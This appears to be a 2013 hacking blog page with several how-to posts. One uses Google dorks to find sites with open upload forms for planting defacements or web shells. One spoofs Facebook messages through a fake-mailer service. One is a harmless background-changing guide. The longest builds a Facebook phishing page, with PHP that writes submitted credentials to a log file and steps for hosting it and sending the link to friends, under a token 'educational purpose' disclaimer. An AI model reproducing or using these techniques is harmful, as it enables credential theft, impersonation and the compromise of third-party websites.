Tuesday 23 July 2013

How we Deface , shell & image upload vulnerability

Deface, Shell & Image Upload Vulnerability
This vulnerability can be used to upload your deface,shell or image on a website.
Google Dorks:inurl:”default_image.asp”
inurl:”default_imagen.asp”
inurl:”/box_image.htm”
 You will get tons of website there. Select any website of your choice, you will get a upload option. Choose your deface, shell or image and click on upload. After the uploading process completes. In the box where all uploaded files are listed, search for the name of your uploaded file. Click on select, under the box you will get the URL of your uploaded file. Add it after the URL of the website (Remember to remove the extra stuff in the URL)
BY HaRis
Posted by at No comments:
Labels: ,

Facebook Massage spoofing methed

Facebook Message Spoofing

In this article I will teach you how to send Facebook fake message means how to send message from FB anyone’s id to FB anyone’s account.
You will Need :-
Sender Email id which is on his/her Facebook account(example@gmail.com)
Recivers Facebook Email id (username@facebook.com)
Instruction where to Start :-
1)First Go to this Fake mailer site http://emkei.cz/
2)Then in FROM NAME and FROM E-MAIL type the Sender Email id (example@gmail.com).
3)Now in TO Write Recivers Facebook Email id (username@facebook.com)
 
4)Now leave all options And come to TEXT write your message
5)Enter Captcha and click on send.
BY HaRis
Posted by at No comments:
Labels:

HOw we change background of facebook login page

Change The Background Of Your Facebook Login Page
Are you bored seeing same white screen every time you open Facebook login page. Do you want to replace it with something you would love to see? Any picture of your loved ones or anything you like. Today, I will share one Google Chrome Extension which will enable you to set any image as your Facebook Login Page Background.

 The plugin is called Facebook Refresh. Just follow the steps given below:
    1. Download Facebook Refresh extension and install it.
    2. After the plugin is installed. Restart your Browser.
    3. Go to extension page or just open this in your browser chrome://extensions/
    4. Select Option which will be listed under Facebook Refresh.

    1. Add the URL of image or path of image if you have the picture in your HDD.
    2. Save it.

Facebook Refresh Chrome Extension Page Change Your Background Of Your Facebook Login Page
 
  1. Open Facebook. Hurray! Background changed.
BY HaRis
Posted by at No comments:
Labels:

Saturday 20 July 2013

how we create facebook fake login page "Phishing Tutorial"

How to create facebook fake login page "Phishing Tutorial"

Download Required File through Downloader (Fast Instalation)
Note: Hacking is a crime. Dont use this tutorial to hack innocent people. I am teaching it for educational purpose only. I will not be responsible for any damage done by you.


well, here we go for creating Fake page of Facebook...
Here we will need 3 types of files for facebook:
1. A php file with any name say login.php. This php file places main role to get the passwords of victim

2. index.html which is a fake html page similar to original Page of Facebook.
3. Photos, CSS, js files




Step 1. Creating a login.php file>
Open notepad and  paste the following lines there... as save it with name login.php




header ('Location: https://www.facebook.com/login.php');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>




step 2. Create index.html Page:
2.1. first of all open login page of Facebook.com..... then right click there> save as/save page as> then save it....


check the downloaded file.... there will be
one htm file(Welcome to Facebook.htm)
A folder(Welcome to Facebook_files) containing some pics, css files and js files.(this folder contains 3rd type of files that i hv mentioned above.)


2.2. Now open the htm file with notepad(right click> open with> notepad)...


and then press ctrl +F and search for action... and you will find a line as shown in screenshot.
Note:in case of some other sites may be you find more then one action word... but you have to find out the exact  type of line as shown in screen shot.... near which you will find a
 tag and method="post" something like that.


2.3. Now replace the url written after action with the name of your php file created in step 1.


Now your fake page is ready....
Save it with name index.html


Step 3: Uploading on a Free Hosting Site:


Now you have to upload all the 3 mentioned files on a free hosting account. Here i m explaining file uploading onhttp://www.yourfreehosting.net/.
1.  first of all sign up for a free hosting Account.


Note: yourfreehosting.net  is now not available for free, you can create account on 
http://www.000webhost.com/525589.html
2. After creating Account, login there, then go to control pannel> File Manager.


3. Now remove the preexisting index.html file.
4. Now click on upload files and then upload there index.html and login.php




5. Now click on New directory to make a new folder there and name it "Welcome to Facebook_files"


6. Now open the directory
"Welcome to Facebook_files"
and then upload all the files(css,js, photos) of folder Welcome to Facebook_files,which was downloaded with facebook page in step 2.


Now your phishing page is ready to hack ;)
7. Now give url of ur index page to ur friends, as soon as they will login through ur created fake page,a new log.txt file will be created and  their password will be saved in that file.


BY HaRis
Posted by at No comments:
Labels: ,
Subscribe to: Posts (Atom)